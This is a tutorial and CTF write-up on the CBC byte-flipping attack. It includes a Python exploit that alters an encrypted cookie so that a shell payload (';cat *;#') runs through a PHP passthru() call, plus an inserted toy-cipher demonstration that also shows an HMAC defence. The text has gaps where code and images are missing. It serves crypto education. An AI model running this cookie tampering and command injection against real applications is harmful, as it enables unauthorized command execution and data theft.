As usual, there are some explanations about this attack out there (see references
at the end), but some knowledge is required to understand it properly, so here I
will describe, step by step, how to perform this attack.
Why?
Introduction
First of all, let's start by understanding how CBC (cipher-block chaining) works. A
detailed explanation can be found here:
http://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Cipher-block_chaining_.28CBC.29
Encryption process
IV: A block of bits that is used to randomize the encryption and hence to
produce distinct ciphertexts even if the same plaintext is encrypted multiple
times.
Key: Used by symmetric encryption algorithms like AES, Blowfish, DES, Triple
DES, etc.
An important point here is that CBC works on a fixed-length group of bits called
a block. In this blog, we will use blocks of 16 bytes each.
Note: As you can see, the ciphertext of the previous block is used to generate
the next one.
Decryption Process
Note: Ciphertext-N-1 is used to generate the plaintext of the next block; this
is where the byte flipping attack comes into play. If we change one byte of
Ciphertext-N-1 then, by XORing it with the next decrypted block, we will get a
different plaintext! You got it? Do not worry, we will see a detailed example
below. Meanwhile, below is a nice diagram explaining this attack:
Block 1: a:2:{s:4:"name";
Block 2: s:6:"sdsdsd";s:8 <<< target here
Block 3: :"greeting";s:20
Block 4: :"echo 'Hello sd
Block 5: sdsd!'";}
A rule of thumb is that the byte you change in a ciphertext block will ONLY affect the
byte at the same offset of the next plaintext block. Our target is at offset 2:
[0] = s
[1] = :
[2] = 6
Therefore we need to change the byte at offset 2 of the first ciphertext block. As
you can see in the code below, at line 2 we get the ciphertext of the whole data,
then at line 3 we change the byte of block 1 at offset 2, and finally we call the
decryption function.
But, how did we change the byte to the value we wanted at line 3?
A = B XOR C
And since A = B XOR C, A XOR B XOR C is equal to 0. With this formula, we can set our own
value by adding it at the end of the XOR calculation, like this:
A XOR B XOR C XOR 7 will give us 7 in the plaintext at offset 2 of the second
block.
Below is the PHP source code so that you can replicate it:
Exercise 2:
Now that we understand how this attack works, let's do a more real-world
exercise. Some weeks ago a CTF competition was hosted by the team
Eindbazen and there was a Web 400 challenge called Moo! You can see all the
details of this task at the end of the blog in References 2 and 3; here I am just
going to describe the final steps of breaking CBC.
We were provided with the source code for analysis. Below is the chunk
important for this exercise:
Basically, you will submit any text in the POST parameter name and the app
will respond with a Hello message concatenating the text submitted at the
end, but two things happen before the message is printed:
3. Finally, any time the page is accessed, if the cookie already exists, it will be
decrypted and its content executed via the passthru() function. Here is where our CBC
attack will give us a different plaintext, as explained in the previous section.
So, I tried to inject the string below into the POST parameter name:
I added the char X, which is the one to be replaced with a single quote via the CBC
byte flipping attack, then the command to be executed, ;cat *;, and finally a #,
which is interpreted as a comment by the shell so that we do not get problems
with the last single quote inserted by the escapeshellarg() function; therefore our
command gets executed successfully.
pos = 51
val = chr(ord('X') ^ ord("'") ^ ord(cookie[pos]))   # cookie byte XOR current char XOR wanted char
exploit = cookie[0:pos] + val + cookie[pos + 1:]
I am altering the cookie, since it has the whole ciphertext. Finally, I got this
result:
First, we can see in yellow that our X was successfully changed to a single
quote in the second block but, since the first block was altered, it got garbage
inserted (in green) which causes an error when trying to unserialize() the data (in
red) and, therefore, the app did not even try to execute our injection.
After sending the above string, voila!!!, unserialize() does not complain about the
garbage received and our shell command is executed successfully!!!!
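As an added example (not the blog's or the CTF's code), here is the flip from the first exercise carried out end to end in Python on a self-contained toy block cipher, with the pos/old/new calculation from the exploit generalized into flip_byte(); the Feistel cipher, key, IV and MAC key are assumed stand-ins for the real AES setup. It also shows the defence: an encrypt-then-MAC tag rejects the tampered ciphertext before unserialize() ever sees the garbage block.

```python
import hashlib
import hmac
BLOCK = 16

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key: bytes, half: bytes, rnd: int) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]  # toy round function

def block_encrypt(key: bytes, blk: bytes) -> bytes:
    # 8-round Feistel network: an assumed stand-in for AES so the demo needs no extra libraries.
    l, r = blk[:8], blk[8:]
    for i in range(8):
        l, r = r, _xor(l, _f(key, r, i))
    return l + r

def block_decrypt(key: bytes, blk: bytes) -> bytes:
    l, r = blk[:8], blk[8:]
    for i in reversed(range(8)):
        l, r = _xor(r, _f(key, l, i)), l
    return l + r

def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):   # P[N] is XORed with C[N-1] (or the IV) before encryption
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):   # D(C[N]) is XORed with C[N-1], so editing C[N-1] edits P[N]
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

def flip_byte(ct: bytes, pos: int, old: str, new: str) -> bytes:
    # The page's formula: C[pos] ^ old ^ new makes the byte at the same offset of the next plaintext block `new`.
    return ct[:pos] + bytes([ct[pos] ^ ord(old) ^ ord(new)]) + ct[pos + 1:]

def demo() -> tuple:
    key, iv, mac_key = b"k" * 16, b"i" * 16, b"m" * 16    # constructed, fixed values for reproducibility
    pt = b'a:2:{s:4:"name";s:6:"sdsdsd";s:8:"greeting";s:20:"echo \'Hello sdsdsd!\'";}'
    ct = cbc_encrypt(key, iv, pt + b"\x00" * (-len(pt) % BLOCK))   # zero padding keeps the demo short
    tag = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()     # encrypt-then-MAC: the defence
    tampered = flip_byte(ct, 2, "6", "7")                  # block 1 offset 2 -> block 2 offset 2
    out = cbc_decrypt(key, iv, tampered)
    mac_ok = hmac.compare_digest(hmac.new(mac_key, iv + tampered, hashlib.sha256).digest(), tag)
    return out[16:32], out[:16] == pt[:16], mac_ok   # block 2 now reads s:7, block 1 is garbage, MAC fails
```

flip_byte(cookie, 100, "X", "'") is the same calculation the exploit performs on the decoded cookie bytes.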
If you want to replicate this exercise, in the Appendix section there is the PHP
code running on the server side and the Python script (a little bit modified from
code provided by Daniel from hardc0de.ru, thanks!!!) to perform the exploit.
Finally, I want to thank the guys from the references mentioned below for
writing those excellent blogs.
References
2. http://codezen.fr/2013/08/05/ebctf-2013-web400-cryptoaescbchmac-write-up/
3. http://hardc0de.ru/2013/08/04/ebctf-web400/
Enjoy it!
Appendix
PHP code:
<?php
ini_set('display_errors',1);
error_reporting(E_ALL);
// ...
\n";
echo "<input type=\"text\" name=\"name\" />\n";
echo "<input type=\"submit\" name=\"submit\" value=\"Submit\" />\n";
echo "</form>
<pre>
\n";
}
?>
Exploit:
#!/usr/bin/python
import requests
import sys
import urllib
from base64 import b64decode as dec
from base64 import b64encode as enc

# ...

#a:2:{s:4:"name";s:42:"zzzzzzzzzzzzzzzzzX;cat *;#zzzzzzzzzzzzzzzz";s:8:"greeting";s:56:"echo 'Hello zzzzzzzzzzzzzzzzzX;cat *;#zzzzzzzzzzzzzzzz!'";}
#a:2:{s:4:"name";
#s:42:"zzzzzzzzzz
#zzzzzzzX;cat *;#
#zzzzzzzzzzzzzzzz
#";s:8:"greeting"
#;s:56:"echo 'Hel
#lo zzzzzzzzzzzzz
# ...

#exploit = 'X' + ';cat *;#a' #Test case first, unsuccess
exploit = 'z'*17 + 'X' + ';cat *;#' + 'z'*16 #Test Success
#exploit = "______________________________________________________; cat *;#"
#Test(exploit)
cookie = GetCookie(exploit)
pos = 100; #test case success: byte of the ciphertext block before the one holding X
#pos = 51; #test case first, unsuccess
val = chr(ord('X') ^ ord("'") ^ ord(cookie[pos]))   # cookie byte XOR 'X' XOR the wanted single quote
exploit = cookie[0:pos] + val + cookie[pos + 1:]
Pwn(exploit)